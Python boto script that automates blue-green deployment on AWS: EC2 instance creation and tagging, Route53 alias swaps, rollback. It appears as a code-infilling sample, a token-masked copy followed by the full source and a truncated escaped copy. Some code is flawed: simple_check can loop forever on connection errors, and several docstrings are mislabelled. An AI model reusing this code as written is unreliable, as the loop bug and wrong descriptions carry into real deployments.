ssh_key, user_data=user_data, instance_type=instance_size,
subnet_id=subnet_id, security_group_ids=sec_group,
instance_initiated_shutdown_behavior=shutdown, dry_run=dry_run)
if reservations is not None and not dry_run:
tag_new_instance(reservations.instances[0], instance_name, env)
else:
LOGGER.error('Something went wrong when creating new instance.'
)
sys.exit(1)
except exception.EC2ResponseError:
if dry_run:
LOGGER.warn(
'New instance would be created and this tags should be assigned'
)
LOGGER.warn('Name: %s' % instance_name)
LOGGER.warn('Environment: %s' % env)
LOGGER.warn('Deployment Date: %s' % time.strftime('%d-%m-%Y'))
return 'OK'
else:
LOGGER.error('Something went wrong when creating new instance.'
)
try:
time.sleep(60)
tag_new_instance(reservations.instances[0],
instance_name, env)
except exception.EC2ResponseError:
sys.exit(1)
else:
LOGGER.warn(
'There is another instance running with %s environment tag (id: %s).'
% (env, instances[0]))
return None
return reservations.instances
def tag_instance(instance, tag_name, tag_key):
"""
:description: Removes old tag and creates new one with updated value.
:param
instance: Instance that should be tagged.
tag_name: Name of the tag.
tag_key: Value of the tag.
:return: None
"""
instance.remove_tag('{0}'.format(tag_name))
instance.add_tag('{0}'.format(tag_name), '{0}'.format(tag_key))
def tag_new_instance(instance, instance_name, environment):
"""
:description: Tags new instance.
:param
instance: Instance that should be tagged.
instance_name: Name of the instance.
        environment: blue or green.
:return: None
"""
instance.add_tag('Name', instance_name)
instance.add_tag('Environment', environment)
instance.add_tag('Deployment Date', time.strftime('%d-%m-%Y'))
def stop_instance(aws_connection, env, domain, live_alias, tag, dry_run=False):
"""
    :description: Stops the previously live instance.
:param
aws_connection: Connections to AWS Route53 service and EC2.
env: Blue or green depends which instance you want to stop (cross check).
domain: Your Domain.
live_alias: Your external DNS record pointing to live web server.
dry-run: True or False. If True, it will not make any changes.
:return: boolean result.
"""
result = False
tag = ''.join(tag.values())
instances = get_specific_instances(aws_connection.get('ec2'),
'Environment', env, 'running')
if check_which_is_live(aws_connection.get('route53'), domain, live_alias
) != env + '.' + domain and instances:
try:
aws_connection.get('ec2').stop_instances(instance_ids=[
instances[0].id], dry_run=dry_run)
tag_instance(instances[0], 'Environment', tag)
except exception.EC2ResponseError:
LOGGER.warn(
'Instance %s would be stopped and tagged with Environment:%s' %
(instances[0].id, tag))
result = True
elif dry_run:
LOGGER.warning('Old instance with tag %s would be stopped.' % env)
else:
LOGGER.error(
            'Could not stop the old instance. It looks like it is live or does not exist. I tried to stop %s instance.'
% env)
return result
<|reserved_special_token_0|>
def get_env(fqdn, domain):
"""
    :description: Gives you the environment from a given fqdn by removing the domain.
:param
fqdn: Fully Qualified Domain Name.
domain: Your domain name.
:return: environment (blue or green).
"""
env = fqdn.replace('.' + domain, '')
return env
def swap_dns(live_alias, future_value, alias_dns_name, zone, records):
"""
:description: Changes alias (blue.<domain> or green.<domain>) that is behind live url.
:param
live_alias: Your external DNS record pointing to live web server.
        future_value: The value the record should point to (an alias fqdn or an IP).
        alias_dns_name: blue.<domain> or green.<domain> for alias records, or None for a plain A record.
        zone: handle to zone that hosts dns records.
        records: set of dns records from the zone.
    :return: Result of the change (AWS response).
"""
try:
change = records.add_change(action='UPSERT', name=live_alias, ttl=
300, type='A', alias_dns_name=alias_dns_name,
alias_hosted_zone_id=zone.id, alias_evaluate_target_health=False)
change.add_value(future_value)
result = records.commit()
except Exception as ex:
LOGGER.error('Could not swap dns entry for %s. Exception: %s' % (
live_alias, ex))
sys.exit(1)
return result
def swap_live_with_staging(aws_connection, domain, current_live, live_alias,
blue_alias, green_alias, dry_run=False):
"""
:description: Changes alias (blue.<domain> or green.<domain>) that is behind live url.
:param
aws_connection: Connections to AWS Route53 service and EC2
domain: Your Domain
current_live: blue.<domain> or green.<domain> depends which is live
live_alias: Your external DNS record pointing to live web server.
dry-run: True or False. If True, it will not make any changes.
    :return: Result of the change (AWS response).
"""
route53_conn = aws_connection.get('route53')
zone = route53_conn.get_zone(domain)
records = route53.record.ResourceRecordSets(connection=route53_conn,
hosted_zone_id=zone.id)
if dry_run:
LOGGER.warn('DNS record %s would be updated with %s' % (live_alias,
green_alias if current_live == blue_alias else blue_alias))
result = 'OK'
elif current_live == blue_alias:
result = swap_dns(live_alias, green_alias, green_alias, zone, records)
else:
result = swap_dns(live_alias, blue_alias, blue_alias, zone, records)
return result
def assign_to_staging(route53_conn, domain, current_live,
instance_public_ip, live_alias, blue_alias, green_alias, dry_run=False):
"""
:description: Assigns newly created instance to staging url
:param
route53_conn: Connection to AWS Route53 service
domain: Your Domain
current_live: blue.<domain> or green.<domain> depends which one was behind your live url.
instance_public_ip: Public IP of newly created instance that would be assigned to staging url.
dry-run: True or False. If True, it will not make any changes.
    :return: Result of the change (AWS response).
"""
zone = route53_conn.get_zone(domain)
records = route53.record.ResourceRecordSets(connection=route53_conn,
hosted_zone_id=zone.id)
if dry_run:
LOGGER.warn('Public IP %s would be assigned to %s' % (
instance_public_ip, live_alias))
result = 'OK'
else:
result = swap_dns(blue_alias if current_live == green_alias else
green_alias, instance_public_ip, None, zone, records)
return result
<|reserved_special_token_0|>
def wait_for_public_ip(ec2_conn, instance_id):
"""
    :description: Gets instance's Public IP. Retries every 10 seconds, up to 24 attempts (about 4 minutes).
:param
ec2_conn: Connection to AWS EC2 service
instance_id: ID of instance :)
:return: Public IP or exits the script
"""
counter = 0
while counter < 24:
stg_instance = ec2_conn.get_only_instances(instance_ids=[instance_id])
if stg_instance[0].ip_address is None:
time.sleep(10)
else:
public_ip = stg_instance[0].ip_address
return str(public_ip)
counter += 1
stg_instance = ec2_conn.get_only_instances(instance_ids=[instance_id])
LOGGER.error('Cannot get Public IP from instance %s' % stg_instance[0].id)
sys.exit(1)
def simple_check(url):
"""
    :description: Checks whether the given url returns a 200 response code, retrying up to 10 times at 60-second intervals.
:param
url: link which should be checked
:return: Boolean
"""
counter = 0
while counter < 10:
try:
r = requests.head('http://' + url)
LOGGER.debug(r.status_code)
if r.status_code == 200:
return True
else:
time.sleep(60)
except requests.ConnectionError:
            LOGGER.error('Failed to get response code from %s - attempt #%s' %
                (url, counter + 1))
        counter += 1
    return False
<|reserved_special_token_0|>
def switch(region, access_key, secret_key, tag, domain, live_url,
blue_alias, green_alias, dry_run=False):
"""
    :description: Swaps live and staging by updating the live dns entry, then stops the previously live instance.
    :param
        region: AWS region
        access_key / secret_key: AWS credentials
        tag: Dictionary with <tag_name> <tag_value> pair used to re-tag the stopped instance
        domain: Your Domain
        live_url: Your external DNS record pointing to live web server.
        blue_alias / green_alias: blue.<domain> and green.<domain> records.
        dry-run: True or False. If True, it will not make any changes.
:return: boolean status
"""
result = True
aws_conn = connect_to_aws(region, access_key, secret_key)
live = check_which_is_live(aws_conn.get('route53'), domain, live_url)
result = swap_live_with_staging(aws_conn, domain, live, live_url,
blue_alias, green_alias, dry_run)
time.sleep(300)
stop_instance(aws_conn, get_env(live, domain), domain, live_url, tag,
dry_run)
return result
def roll_back(region, access_key, secret_key, tag, domain, live_alias,
blue_alias, green_alias, dry_run=False):
"""
:description: Rolls back deployment by starting instance with old-app tag and swapping dns entry.
:param
        region: AWS region
        access_key / secret_key: AWS credentials
        tag: Dictionary with <tag_name> <tag_value> pair identifying the parked instance
        domain: Your Domain
        live_alias: Your external DNS record pointing to live web server.
        blue_alias / green_alias: blue.<domain> and green.<domain> records.
        dry-run: True or False. If True, it will not make any changes.
:return: boolean status
"""
result = True
aws_conn = connect_to_aws(region, access_key, secret_key)
old_instance = get_specific_instances(aws_conn.get('ec2'), ''.join(tag.
keys()), ''.join(tag.values()), ['stopped', 'running'])
current_live = check_which_is_live(aws_conn.get('route53'), domain,
live_alias)
env = get_env(current_live, domain)
if not old_instance:
LOGGER.error(
'No instance with tag %s was found. No chance to roll back Sir!' %
''.join(tag.values()))
else:
try:
if dry_run:
LOGGER.warning(
'Instance %s would be started and tagged with %s' % (
old_instance, env))
else:
old_instance[0].start()
tag_instance(old_instance[0], 'Environment', 'blue' if env ==
'green' else 'green')
instance_public_ip = wait_for_public_ip(aws_conn.get('ec2'),
old_instance[0].id)
assign_to_staging(aws_conn.get('route53'), domain, current_live,
instance_public_ip, live_alias, blue_alias, green_alias,
dry_run=False)
swap_live_with_staging(aws_conn, domain, current_live,
live_alias, blue_alias, green_alias, dry_run)
stop_instance(aws_conn, env, domain, live_alias, tag, dry_run)
except exception.EC2ResponseError:
LOGGER.error('Could not start %s instance.' % old_instance)
result = False
return result
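# A hedged usage sketch with placeholder values only; 'old_app' is a
# hypothetical tag value for the parked instance:
# switch('eu-west-1', access_key, secret_key, {'Environment': 'old_app'},
#     'example.com', 'www.example.com', 'blue.example.com',
#     'green.example.com', dry_run=True)
# roll_back('eu-west-1', access_key, secret_key, {'Environment': 'old_app'},
#     'example.com', 'www.example.com', 'blue.example.com',
#     'green.example.com', dry_run=True)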
<|reserved_special_token_0|>
<|reserved_special_token_1|>
#!/usr/bin/python3.4
__author__ = 'jacek gruzewski'
"""
To do: throw exceptions rather than calling sys.exit(1)
"""
############################################################
# IMPORTS
############################################################
# Python's libraries
import time
import sys
import logging
import os
import requests
# AWS Boto library
from boto import ec2, route53, exception
#####################################################################
# Static data and configuration
#####################################################################
# Static AWS Rest service for getting instance details
AWS_METADATA = 'http://169.254.169.254/latest/meta-data/instance-id'
log_path = '/var/log/'
file_name = 'blue-green-deploy'
#####################################################################
# Functions
#####################################################################
def read_config_file(logger):
# Config file imports
import aws_config
try:
# Checking if all attributes were set.
domain = getattr(aws_config, "domain")
config = {
'reg': getattr(aws_config, "region"),
'access': getattr(aws_config, "access_key"),
'secret': getattr(aws_config, "secret_key"),
'srv': getattr(aws_config, "instance_name"),
'domain': domain,
'alias': getattr(aws_config, "live_record_name") + "." + domain,
'image': getattr(aws_config, "ami_id"),
'key': getattr(aws_config, "key_pair"),
'sec': [getattr(aws_config, "security_group")],
'subnet': getattr(aws_config, "subnet_id"),
'type': getattr(aws_config, "instance_size"),
'shutdown': getattr(aws_config, "shutdown_behavior"),
'dry-run': getattr(aws_config, "dry_run")
}
except AttributeError as at_err:
        # Falling back to environment variables. Worth to try!
        logger.error('Could not read parameters from aws_config.py file. [%s]', at_err)
        region = os.environ.get('AWS_DEFAULT_REGION')
        aws_access_key = os.environ.get('AWS_ACCESS_KEY_ID')
        aws_secret_key = os.environ.get('AWS_SECRET_ACCESS_KEY')
        if region is None or aws_access_key is None or aws_secret_key is None:
            # At least we tried.
            logger.error('Could not find AWS credentials in environment variables')
            sys.exit(1)
        else:
            logger.info('Got AWS credentials from environment variables')
            # Only the credentials can be recovered here; the deployment-specific
            # settings (AMI, subnet, aliases, ...) still have to come from aws_config.
            config = {'reg': region, 'access': aws_access_key, 'secret': aws_secret_key}
    return config
def set_up_logging(path, file):
# Log file. Always in /var/log!! It will log into the file and console
logging.basicConfig(level=logging.WARN)
log_formatter = logging.Formatter("%(asctime)s [%(levelname)-5.5s] %(message)s")
root_logger = logging.getLogger()
file_handler = logging.FileHandler("{0}/{1}.log".format(path, file))
file_handler.setFormatter(log_formatter)
root_logger.addHandler(file_handler)
return root_logger
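# The module-level LOGGER used by the functions below is presumably created
# from this helper further down, e.g.: LOGGER = set_up_logging(log_path, file_name)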
def connect_to_aws(region, aws_access_key, aws_secret_key):
"""
:param:
region: AWS region
aws_access_key: AWS Access Key
aws_secret_key: AWS Secret Key
:return: map of aws services and connection handles for them.
"""
ec2_conn = ec2.connect_to_region(region_name=region,
aws_access_key_id=aws_access_key,
aws_secret_access_key=aws_secret_key)
route53_conn = route53.Route53Connection(aws_access_key_id=aws_access_key,
aws_secret_access_key=aws_secret_key)
if ec2_conn is None:
        logging.error('Could not connect to EC2 with these parameters: %s, %s, <secret key>', region, aws_access_key)
sys.exit(1)
else:
logging.info('Connected to AWS EC2 [%s]', region)
if route53_conn is None:
        logging.error('Could not connect to Route53 with these parameters: %s, <secret key>', aws_access_key)
sys.exit(1)
else:
logging.info('Connected to AWS Route53')
return {'ec2': ec2_conn, 'route53': route53_conn}
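# Hedged usage sketch -- callers index the returned map by service name
# ('eu-west-1' is a placeholder region):
#   aws_conn = connect_to_aws('eu-west-1', access_key, secret_key)
#   ec2_conn = aws_conn.get('ec2')
#   route53_conn = aws_conn.get('route53')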
def get_specific_instances(ec2_conn, tag_key, tag_value, instance_state):
"""
:description: Returns requested instance - uses filters to get it.
:param
ec2_conn: Connections to AWS EC2.
tag_key: Name of the tag.
tag_value: Value of the tag.
instance_state: One of three states - "running" / "pending" / "stopped".
:return: boolean result.
"""
# Filters instances with specific tag and in specific state.
instances = ec2_conn.get_only_instances(filters={"tag:{0}".format(tag_key): tag_value,
"instance-state-name": instance_state})
return instances
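# Example with a hypothetical tag value: all stopped instances parked as
# roll-back candidates:
#   get_specific_instances(ec2_conn, 'Environment', 'old_app', ['stopped'])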
def create_new_instance(ec2_conn, image_id, ssh_key, sec_group, subnet_id, env, instance_name, user_data=None,
instance_size='t2.micro', shutdown='stop', dry_run=False):
"""
:param
ec2_conn: connection to AWS EC2 service
image_id: Amazon Machine Image ID with all your software
ssh_key: AWS key pair name
sec_group: Security group ID that should be allocated
subnet_id: Subnet ID in which your instance should be created
env: Environment (blue / green / old_app)
instance_name: Name tag value
user_data: Cloud-Init script that will run once
instance_size: String with instance size
shutdown_behaviour: stop or termination
dry-run: True or False. If True, it will not make any changes.
:return: instance ID if created or None
"""
# Checks (by filtering instances currently running) if there is no other instance running with the same tags.
instances = get_specific_instances(ec2_conn, "Environment", env, ["running", "pending"])
if not instances:
        # If no instance with these tags is running, create a new one.
try:
reservations = ec2_conn.run_instances(image_id,
key_name=ssh_key,
user_data=user_data,
instance_type=instance_size,
subnet_id=subnet_id,
security_group_ids=sec_group,
instance_initiated_shutdown_behavior=shutdown,
dry_run=dry_run)
if reservations is not None and not dry_run:
# When instance was created, we have to assign tags.
tag_new_instance(reservations.instances[0], instance_name, env)
else:
LOGGER.error('Something went wrong when creating new instance.')
sys.exit(1)
except exception.EC2ResponseError:
if dry_run:
LOGGER.warn('New instance would be created and this tags should be assigned')
LOGGER.warn('Name: %s' % instance_name)
LOGGER.warn('Environment: %s' % env)
LOGGER.warn('Deployment Date: %s' % time.strftime("%d-%m-%Y"))
return 'OK'
else:
LOGGER.error('Something went wrong when creating new instance.')
try:
# Last chance - waiting 1 minute to tag instance.
time.sleep(60)
tag_new_instance(reservations.instances[0], instance_name, env)
except exception.EC2ResponseError:
sys.exit(1)
else:
# Looks like there was another instance running with the same tags.
LOGGER.warn('There is another instance running with %s environment tag (id: %s).' % (env, instances[0]))
return None
return reservations.instances
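# Hedged sketch of how this maps onto the config dict from read_config_file
# (key names match that function; targeting 'green' is an assumption):
#   create_new_instance(aws_conn.get('ec2'), config['image'], config['key'],
#                       config['sec'], config['subnet'], 'green', config['srv'],
#                       instance_size=config['type'], shutdown=config['shutdown'],
#                       dry_run=config['dry-run'])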
def tag_instance(instance, tag_name, tag_key):
"""
:description: Removes old tag and creates new one with updated value.
:param
instance: Instance that should be tagged.
tag_name: Name of the tag.
tag_key: Value of the tag.
:return: None
"""
instance.remove_tag('{0}'.format(tag_name))
instance.add_tag('{0}'.format(tag_name), '{0}'.format(tag_key))
def tag_new_instance(instance, instance_name, environment):
"""
:description: Tags new instance.
:param
instance: Instance that should be tagged.
instance_name: Name of the instance.
        environment: blue or green.
:return: None
"""
instance.add_tag('Name', instance_name)
instance.add_tag('Environment', environment)
instance.add_tag('Deployment Date', time.strftime("%d-%m-%Y"))
def stop_instance(aws_connection, env, domain, live_alias, tag, dry_run=False):
"""
    :description: Stops the previously live instance.
:param
aws_connection: Connections to AWS Route53 service and EC2.
env: Blue or green depends which instance you want to stop (cross check).
domain: Your Domain.
live_alias: Your external DNS record pointing to live web server.
dry-run: True or False. If True, it will not make any changes.
:return: boolean result.
"""
result = False
tag = ''.join(tag.values())
# Gets past live instance.
instances = get_specific_instances(aws_connection.get('ec2'), "Environment", env, "running")
if check_which_is_live(aws_connection.get('route53'), domain, live_alias) != (env + "." + domain) and instances:
# Instance is not live
try:
aws_connection.get('ec2').stop_instances(instance_ids=[instances[0].id], dry_run=dry_run)
tag_instance(instances[0], 'Environment', tag)
except exception.EC2ResponseError:
LOGGER.warn('Instance %s would be stopped and tagged with Environment:%s' % (instances[0].id, tag))
result = True
else:
if dry_run:
LOGGER.warning('Old instance with tag %s would be stopped.' % env)
else:
            LOGGER.error('Could not stop the old instance. It looks like it is live or does not exist. '
'I tried to stop %s instance.' % env)
return result
def check_which_is_live(route53_conn, domain, live_alias):
"""
:description: Checks which alias (blue.<domain> or green.<domain>) is live.
:param
route53_conn: Connection to AWS Route53 service
domain: Your Domain
live_alias: Your external DNS record pointing to live web server.
:return: fqdn of live sub alias (blue or green)
"""
live_fqdn = route53_conn.get_zone(domain).get_a(live_alias).alias_dns_name
return live_fqdn
def get_env(fqdn, domain):
"""
:description: Give you environment from given fqdn by removing domain from fqdn.
:param
fqdn: Fully Qualified Domain Name.
domain: Your domain name.
:return: environment (blue or green).
"""
env = fqdn.replace("." + domain, "")
return env
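
# Example: get_env('blue.example.com', 'example.com') returns 'blue'.
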
def swap_dns(live_alias, future_value, alias_dns_name, zone, records):
"""
    :description: Upserts a Route53 record so the given alias points at a new value.
    :param
        live_alias: DNS record name that should be updated (live or staging alias).
        future_value: value the record should point to (an alias fqdn or an IP address).
        alias_dns_name: alias target fqdn, or None to create a plain A record.
        zone: handle to the zone that hosts the dns records.
        records: set of dns records from the zone.
    :return: Result of the change (AWS response).
try:
change = records.add_change(action='UPSERT',
name=live_alias,
ttl=300,
type='A',
alias_dns_name=alias_dns_name,
alias_hosted_zone_id=zone.id,
alias_evaluate_target_health=False)
change.add_value(future_value)
result = records.commit()
except Exception as ex:
LOGGER.error('Could not swap dns entry for %s. Exception: %s' % (live_alias, ex))
sys.exit(1)
return result
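
# Design note: UPSERT creates the record when it is missing and updates it otherwise, so this
# one helper serves both the live alias swap and the staging A-record assignment.
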
def swap_live_with_staging(aws_connection, domain, current_live, live_alias, blue_alias, green_alias, dry_run=False):
"""
:description: Changes alias (blue.<domain> or green.<domain>) that is behind live url.
:param
aws_connection: Connections to AWS Route53 service and EC2
domain: Your Domain
current_live: blue.<domain> or green.<domain> depends which is live
        live_alias: Your external DNS record pointing to live web server.
        blue_alias: blue.<domain> record name.
        green_alias: green.<domain> record name.
        dry_run: True or False. If True, it will not make any changes.
:return: Result of the change (AWS respond).
"""
route53_conn = aws_connection.get('route53')
zone = route53_conn.get_zone(domain)
records = route53.record.ResourceRecordSets(connection=route53_conn, hosted_zone_id=zone.id)
if dry_run:
# Dry run
LOGGER.warn('DNS record %s would be updated with %s' %
(live_alias, green_alias if current_live == blue_alias else blue_alias))
result = 'OK'
else:
        # Note: a simple_check(<staging alias>) call could gate this swap on a healthy
        # staging server before flipping DNS; the original call sites are left disabled.
        if current_live == blue_alias:
            # Blue was live so now time for Green.
            result = swap_dns(live_alias, green_alias, green_alias, zone, records)
        else:
            # This time Green was live. Blue, are you ready?
            result = swap_dns(live_alias, blue_alias, blue_alias, zone, records)
return result
def assign_to_staging(route53_conn, domain, current_live, instance_public_ip, live_alias, blue_alias, green_alias,
dry_run=False):
"""
:description: Assigns newly created instance to staging url
:param
route53_conn: Connection to AWS Route53 service
domain: Your Domain
current_live: blue.<domain> or green.<domain> depends which one was behind your live url.
        instance_public_ip: Public IP of newly created instance that would be assigned to staging url.
        live_alias: Your external DNS record pointing to live web server.
        blue_alias: blue.<domain> record name.
        green_alias: green.<domain> record name.
        dry_run: True or False. If True, it will not make any changes.
:return: Result of the change (AWS respond).
"""
zone = route53_conn.get_zone(domain)
records = route53.record.ResourceRecordSets(connection=route53_conn, hosted_zone_id=zone.id)
    # The record to update is the staging alias - the one that is NOT currently live.
    staging_alias = blue_alias if current_live == green_alias else green_alias

    if dry_run:
        LOGGER.warn('Public IP %s would be assigned to %s' % (instance_public_ip, staging_alias))

        result = 'OK'
    else:
        result = swap_dns(staging_alias, instance_public_ip, None, zone, records)
return result
def delete_old_instance(ec2_conn, tag, dry_run=False):
"""
:description: Deletes instance for given tag only if it is stopped
:param
ec2_conn: Connection to AWS EC2 service
        tag: Dictionary with <tag_name> <tag_value> pair
dry-run: True or False. If True, it will not make any changes.
:return: boolean status
"""
result = False
    # Filters instances with the given tag (conventionally Environment = old-app) and only in stopped state.
    instances = get_specific_instances(ec2_conn, ''.join(tag.keys()), ''.join(tag.values()), "stopped")

    if len(instances) == 1:
# If there is only 1 instance in that state.
old = instances[0]
LOGGER.debug("I am going to delete %s" % old.id)
try:
deleted_old = ec2_conn.terminate_instances(instance_ids=[old.id], dry_run=dry_run)
            # terminate_instances returns the instances it acted on. Worth checking it is the one we wanted to delete.
if deleted_old[0].id == old.id:
LOGGER.info('Deleted %s' % deleted_old[0].id)
result = True
except exception.EC2ResponseError as ex:
            if dry_run:
                LOGGER.warn('Instance %s would be deleted.' % old.id)
else:
LOGGER.error('Something went wrong when deleting old instance.')
LOGGER.error(ex)
else:
# It could be none or multiple instance in that state. Better notify before someone starts complaining.
LOGGER.warn('No old instance or more than 1 instance was found. I hope you are aware of that. Continue.')
result = True # I am returning true because it shouldn't be a big issue
return result
def wait_for_public_ip(ec2_conn, instance_id):
"""
    :description: Gets instance's Public IP. Retries every 10 seconds for up to 4 minutes.
:param
ec2_conn: Connection to AWS EC2 service
instance_id: ID of instance :)
:return: Public IP or exits the script
"""
counter = 0
while counter < 24:
        # We are going to check every 10 seconds for up to 4 minutes.
stg_instance = ec2_conn.get_only_instances(instance_ids=[instance_id])
if stg_instance[0].ip_address is None:
            # Still not available so wait 10 seconds.
time.sleep(10)
else:
# We got it!
public_ip = stg_instance[0].ip_address
return str(public_ip)
counter += 1
# Unfortunately we couldn't get Public IP so logging and exiting.
stg_instance = ec2_conn.get_only_instances(instance_ids=[instance_id])
LOGGER.error('Cannot get Public IP from instance %s' % stg_instance[0].id)
sys.exit(1)
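
# Design note: polling with a hard retry cap (24 tries x 10 seconds) keeps the deploy from
# hanging forever when AWS is slow to allocate a public address.
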
def simple_check(url):
"""
    :description: Checks if the given url returns a 200 response code, retrying up to 10 times at 60 second intervals.
:param
url: link which should be checked
:return: Boolean
"""
    counter = 0
    while counter < 10:
        try:
            r = requests.head('http://' + url)
            LOGGER.debug(r.status_code)
            if r.status_code == 200:
                return True
            else:
                time.sleep(60)
        except requests.ConnectionError:
            LOGGER.error("Failed to get response code from %s - attempt #%s" % (url, counter + 1))
            time.sleep(60)
        counter += 1
    return False
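
# simple_check is available to gate swap_live_with_staging before flipping DNS (see the note
# in that function); it is currently not called anywhere.
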
def write_to_file(to_write):
    """
    :description: Writes the given string to parameters.properties for later pipeline steps.
    """
    with open('parameters.properties', 'w') as f:
        f.write(to_write)
def switch(region, access_key, secret_key, tag, domain, live_url, blue_alias, green_alias, dry_run=False):
"""
    :description: Swaps the live alias with the staging one and then stops the previously live instance.
    :param
        region, access_key, secret_key: AWS region and credentials.
        tag: Dictionary with <tag_name> <tag_value> pair used to re-tag the stopped instance.
        domain: Your Domain.
        live_url: Your external DNS record pointing to live web server.
        blue_alias / green_alias: blue.<domain> and green.<domain> record names.
        dry_run: True or False. If True, it will not make any changes.
"""
    # 1. Connects to AWS
    aws_conn = connect_to_aws(region, access_key, secret_key)
# 2. Check which is live at the moment and which should be stopped.
live = check_which_is_live(aws_conn.get('route53'), domain, live_url)
# 3. Swap DNS
result = swap_live_with_staging(aws_conn, domain, live, live_url, blue_alias, green_alias, dry_run)
    # 4. Stop and tag the old one. We do it after 5 minutes to give in-flight connections a chance to close safely.
time.sleep(300)
stop_instance(aws_conn, get_env(live, domain), domain, live_url, tag, dry_run)
return result
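
# Typical pipeline order (a sketch of intent, not enforced by this module): deployment_stage()
# brings up the new instance on the staging alias, switch() flips the live alias once staging
# checks pass, and roll_back() reverts to the previously live instance if needed.
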
def roll_back(region, access_key, secret_key, tag, domain, live_alias, blue_alias, green_alias, dry_run=False):
"""
:description: Rolls back deployment by starting instance with old-app tag and swapping dns entry.
    :param
        region, access_key, secret_key: AWS region and credentials.
        tag: Dictionary with <tag_name> <tag_value> pair that marks the old instance.
        domain: Your Domain.
        live_alias: Your external DNS record pointing to live web server.
        blue_alias / green_alias: blue.<domain> and green.<domain> record names.
        dry_run: True or False. If True, it will not make any changes.
:return: boolean status
"""
result = True
# 1. Connects to AWS
aws_conn = connect_to_aws(region, access_key, secret_key)
# 2. Get instance ID of old instance. Check which environment is live.
old_instance = get_specific_instances(aws_conn.get('ec2'), ''.join(tag.keys()), ''.join(tag.values()),
['stopped', 'running'])
current_live = check_which_is_live(aws_conn.get('route53'), domain, live_alias)
env = get_env(current_live, domain)
# 3. Do the Magic ;)
if not old_instance:
LOGGER.error('No instance with tag %s was found. No chance to roll back Sir!' % ''.join(tag.values()))
else:
try:
if dry_run:
                LOGGER.warning('Instance %s would be started and tagged with Environment:%s' % (old_instance[0].id, 'blue' if env == 'green' else 'green'))
else:
# Start old instance
old_instance[0].start()
tag_instance(old_instance[0], 'Environment', 'blue' if env == 'green' else 'green')
# Refresh its public IP as it could change.
instance_public_ip = wait_for_public_ip(aws_conn.get('ec2'), old_instance[0].id)
assign_to_staging(aws_conn.get('route53'), domain, current_live, instance_public_ip, live_alias,
blue_alias, green_alias, dry_run=False)
swap_live_with_staging(aws_conn, domain, current_live, live_alias, blue_alias, green_alias, dry_run)
stop_instance(aws_conn, env, domain, live_alias, tag, dry_run)
except exception.EC2ResponseError:
LOGGER.error('Could not start %s instance.' % old_instance)
result = False
return result
def deployment_stage(region, access_key, secret_key, srv_name, domain, live_url, blue_alias, green_alias, tag, image_id,
ssh_key, sec_group, subnet_id, instance_size, shutdown, dry_run=False):
"""
:description: Delivers new instance with staging dns (blue / green).
:param
region: region to which you want to deploy your instance
access_key: AWS Access Key
secret_key: AWS Secret Key
srv_name: How you want to call your web server
domain: Your domain
live_url: DNS record for your live website
        blue_alias: Blue record name (blue.<domain>)
        green_alias: Green record name (green.<domain>)
        tag: Dictionary with <tag_name> <tag_value> pair that marks the old instance
image_id: Amazon Machine Image ID with all your software
ssh_key: AWS key pair name
sec_group: Security group ID that should be allocated
subnet_id: Subnet ID in which your instance should be created
instance_size: String with instance size
        shutdown: stop or terminate
dry-run: True or False. If True, it will not make any changes.
:return: string with url and ip address to staging server
"""
# 1. Connects to AWS
aws_connections = connect_to_aws(region, access_key, secret_key)
# 2. Delete old instance which should be stopped
deleted = delete_old_instance(aws_connections.get('ec2'), tag, dry_run)
# 3. Check which environment (blue/green) is live
live = check_which_is_live(aws_connections.get('route53'), domain, live_url)
if live == blue_alias:
env = 'green'
else:
env = 'blue'
# 4. If deleted then we can create new instance
if dry_run:
# Dry Run
create_new_instance(aws_connections.get('ec2'), image_id, ssh_key, sec_group, subnet_id, env, srv_name, None,
instance_size, shutdown, dry_run)
assign_to_staging(aws_connections.get('route53'), domain, live, "127.0.0.1", live_url, blue_alias,
green_alias, dry_run)
sys.exit(0)
elif deleted:
staging_instance = create_new_instance(aws_connections.get('ec2'), image_id, ssh_key, sec_group, subnet_id, env,
srv_name, None, instance_size, shutdown, dry_run)
# 5. Assign right dns alias only if we managed to create instance in previous step
if staging_instance is None:
# There were some problems with creating new instance
LOGGER.error('Could not create new instance.')
sys.exit(1)
else:
# Everything was all right. Waiting for Public IP
if staging_instance[0].ip_address is None:
# Unfortunately Public IP is not available straight away so we have to wait for it.
public_ip = wait_for_public_ip(aws_connections.get('ec2'), staging_instance[0].id)
if public_ip is None:
LOGGER.error('Cannot get Public IP from instance %s' % staging_instance[0].id)
sys.exit(1)
else:
# Or maybe it is? :)
public_ip = staging_instance[0].ip_address
assign_to_staging(aws_connections.get('route53'), domain, live, public_ip, live_url, blue_alias, green_alias,
dry_run)
write_to_file("staging-server = " + public_ip)
return str(env + "." + domain + ": " + public_ip)
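
# End-to-end usage sketch. Values come from aws_config.py via read_config_file (defined
# earlier in this file); the tag dict is an assumption based on the Environment = old-app
# convention used by delete_old_instance:
#   config = read_config_file(LOGGER)
#   deployment_stage(config['reg'], config['access'], config['secret'], config['srv'],
#                    config['domain'], config['alias'], 'blue.' + config['domain'],
#                    'green.' + config['domain'], {'Environment': 'old-app'},
#                    config['image'], config['key'], config['sec'], config['subnet'],
#                    config['type'], config['shutdown'], config['dry-run'])
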
LOGGER = set_up_logging(log_path, file_name)
Retries every 5 seconds for 30 seconds.\n :param\n ec2_conn: Connection to AWS EC2 service\n instance_id: ID of instance :)\n :return: Public IP or exits the script\n \"\"\"\n counter = 0\n\n while counter < 24:\n # We are going to check every 10 seconds for 2 minutes.\n stg_instance = ec2_conn.get_only_instances(instance_ids=[instance_id])\n\n if stg_instance[0].ip_address is None:\n # Still not available so wait 5 seconds.\n time.sleep(10)\n else:\n # We got it!\n public_ip = stg_instance[0].ip_address\n return str(public_ip)\n\n counter += 1\n\n # Unfortunately we couldn't get Public IP so logging and exiting.\n stg_instance = ec2_conn.get_only_instances(instance_ids=[instance_id])\n LOGGER.error('Cannot get Public IP from instance %s' % stg_instance[0].id)\n sys.exit(1)\n\n\ndef simple_check(url):\n \"\"\"\n :description: Checks if given url is returning 200 respond code for 10 minutes in 60 seconds intervals.\n :param\n url: link which should be checked\n :return: Boolean\n \"\"\"\n\n counter = 0\n\n while counter < 10:\n try:\n r = requests.head('http://' + url)\n LOGGER.debug(r.status_code)\n if r.status_code == 200:\n return True\n else:\n time.sleep(60)\n except requests.ConnectionError:\n LOGGER.error(\"Failed to get respond code from %s - attempt #%s\" % (url, counter + 1))\n\n return False\n\n\ndef write_to_file(to_write):\n f = open('parameters.properties', 'w')\n f.write(to_write)\n\n\ndef switch(region, access_key, secret_key, tag, domain, live_url, blue_alias, green_alias, dry_run=False):\n \"\"\"\n :description: Rolls back deployment by starting instance with old-app tag and swapping dns entry.\n :param\n ec2_conn: Connection to AWS 